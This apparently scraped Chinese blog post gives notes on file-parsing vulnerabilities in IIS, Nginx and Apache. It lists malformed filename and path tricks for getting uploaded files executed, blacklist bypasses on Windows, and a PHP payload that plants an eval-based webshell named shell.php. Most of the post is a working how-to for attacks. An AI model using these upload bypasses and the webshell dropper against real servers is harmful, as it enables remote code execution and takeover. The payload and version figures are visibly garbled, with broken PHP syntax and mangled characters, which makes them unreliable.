zoukankan      html  css  js  c++  java
  • 文件解析漏洞

    0x00 IIS5.x/6.0解析漏洞

    1.目录解析(在asp文件后缀的文件可以以asp的格式被解析)

    /xx.asp/xx.jpg

    2.文件解析(以前可以绕狗和策略)

    test.asp;.jpg

    0x01 IIS7.0/IIS7.5/Nginx<8.03畸形解析漏洞

    Nginx解析漏洞是由我国安全组织80sec发现

    在默认Fast-CGI开启状况下,上传一个test.jpg,内容为

    <?PHP fputs(fopen('shell.php','w')>,'<?php?eval($_POST[cmd]?>');?>

    直接访问test.jpg/.php,则会在这个目录下生成一个一句话木马shell.php

    0x02 Nginx<8.03?空字节代码执行漏洞

    影响:0.5. 0.6. ?0.7?<=?0.7.65 ?0.8?<=?0.8.37

    Nginx在图片中嵌入PHP代码然后通过访问

    test,jpg%00.php

    0x03 Apache解析漏洞

    Apache是从右往左进行解析,如果不能解析,就往前跳,再进行识别解析。

    那么可以写 test,php.owf.rar 后面两个后缀名,apache是无法识别的,所以最终跳到前面的php后缀进行解析。

    判断是不是合法的后缀,就只能一个个进行尝试看看是否能成功。

    0x04 其他

    在windows环境,test.jpg[空格]或者test.jpg. 这两类都是不被允许的,windows会自动消除多余的空格或者点绕过黑名单。

    以及上一章节的,htaccess文件也可以视作一个解析,不多赘述。

    我的志向是星辰大海。
  • 相关阅读:
    学习笔记
    学习笔记
    web前端初步学习心得
    Redis学习 命令执行
    Redis笔记 info命令
    UNIX编程 GetAddrInfo笔记
    UNIX编程 TCP基础读写笔记
    日本語自然言語処理
    日本語助詞と助動詞
    UNIX编程 I/O多路转接笔记
  • 原文地址:https://www.cnblogs.com/xiaqingfeng/p/12084866.html
Copyright © 2011-2022 走看看